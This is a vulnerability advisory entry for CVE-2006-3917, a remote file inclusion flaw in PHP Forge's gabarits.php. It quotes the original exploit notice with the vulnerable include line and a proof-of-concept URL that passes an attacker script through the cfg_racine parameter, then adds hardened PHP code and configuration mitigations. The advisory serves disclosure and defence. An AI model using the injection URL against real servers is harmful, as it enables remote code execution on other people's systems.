PHP Forge Cfg_Racine 'gabarits.php' Remote File Inclusion Vulnerability

Vulnerability ID: 1110658
Vulnerability type: Input validation
Published: 2006-07-22
Updated: 2006-08-02
CVE ID: CVE-2006-3917
CNNVD-ID: CNNVD-200607-485
Platform: PHP
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/2058
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-485
|Vulnerability details
inc/gabarits.php in R. Corson PHP Forge 3 beta 2 and earlier contains a remote file inclusion vulnerability. A remote attacker can execute arbitrary PHP code via a URL in the cfg_racine parameter.
|Vulnerability EXP
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
phpforge3b2(cfg_racine) Remote File Inclusion Vulnerability
------------------------
Virangar Security Team
www.virangar.org >public
www.virangar.net >priv8
--------
Discovered By : Snake & hadihadi_zedehal
contact : Snake.Apollyon@YaHo0.com ** hadihadi_zedehal_2006@YaHo0.com
special tnx 2: A.Nosrati * l0pht.Blackhot * Kouros.virus & all virangar members
greetz:hadi_aryaie2004 * ahmad_virangar2004  * mahtab_e66
---------
bug found in file: gabarits.php
Remote : Yes
Critical Level : Dangerous
web: http://phpforge.oirac.com/
---------
vulnerable code:
include_once($cfg_racine."inc/systeme.php");
---------

http://www.victim.com/[patch]/inc/gabarits.php?cfg_racine=[evil script]

--------
See you in Hell!!.....
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

# milw0rm.com [2006-07-22]
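The root cause is that the include path prefix comes from a variable the HTTP client can set. The following is an added example, not PHP Forge's own code: it places the quoted vulnerable pattern next to a hardened version. It assumes the script lives in inc/ under the application root (so dirname(__DIR__) is that root) and that $cfg_racine becomes request-controlled, for example through register_globals, as the PoC URL implies.

```php
<?php
// --- vulnerable pattern (as quoted in the advisory) ---
// include_once($cfg_racine."inc/systeme.php");
// With allow_url_include on, a URL in $cfg_racine makes PHP fetch and run
// remote code; a local path prefix lets any readable file be included.

// --- hardened version ---
// 1. Never derive the include root from request data. Anchor it to the
//    script's own location, which an HTTP client cannot influence.
//    (Assumption: this file is inc/gabarits.php, so the app root is one up.)
$cfg_racine = dirname(__DIR__) . DIRECTORY_SEPARATOR;

// 2. Defence in depth: validate the include root before use, so a later
//    regression (e.g. reading it from config or the request) cannot
//    silently reintroduce file inclusion.
function safe_include_root(string $root, string $app_base): string
{
    // Reject anything that looks like a stream wrapper or URL
    // (http://, ftp://, php://, data:, ...).
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $root)) {
        throw new RuntimeException('include root must not be a URL or stream wrapper');
    }
    // realpath() resolves symlinks and ../ segments and returns false for
    // paths that do not exist, which we also treat as a failure.
    $real = realpath($root);
    $base = realpath($app_base);
    if ($real === false || $base === false) {
        throw new RuntimeException('include root does not exist');
    }
    // Containment check: the resolved root must be the app base itself or
    // a directory underneath it. The trailing separator prevents
    // /var/www/app2 from matching a base of /var/www/app.
    $realDir = $real . DIRECTORY_SEPARATOR;
    $baseDir = $base . DIRECTORY_SEPARATOR;
    if (strncmp($realDir, $baseDir, strlen($baseDir)) !== 0) {
        throw new RuntimeException('include root is outside the application directory');
    }
    return $realDir;
}

$root = safe_include_root($cfg_racine, dirname(__DIR__));
include_once $root . 'inc/systeme.php';

// Hosting-level mitigation that blunts this class of bug even in unpatched
// code: keep allow_url_include = Off (the default since PHP 5.2) and
// register_globals = Off in php.ini.
```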
|References

Source: XF
Name: phpforge-gabarits-file-include(27919)
Link: http://xforce.iss.net/xforce/xfdb/27919
Source: BID
Name: 19139
Link: http://www.securityfocus.com/bid/19139
Source: MILW0RM
Name: 2058
Link: http://www.milw0rm.com/exploits/2058
Source: VUPEN
Name: ADV-2006-2938
Link: http://www.frsirt.com/english/advisories/2006/2938
Source: MILW0RM
Name: 2058
Link: http://milw0rm.com/exploits/2058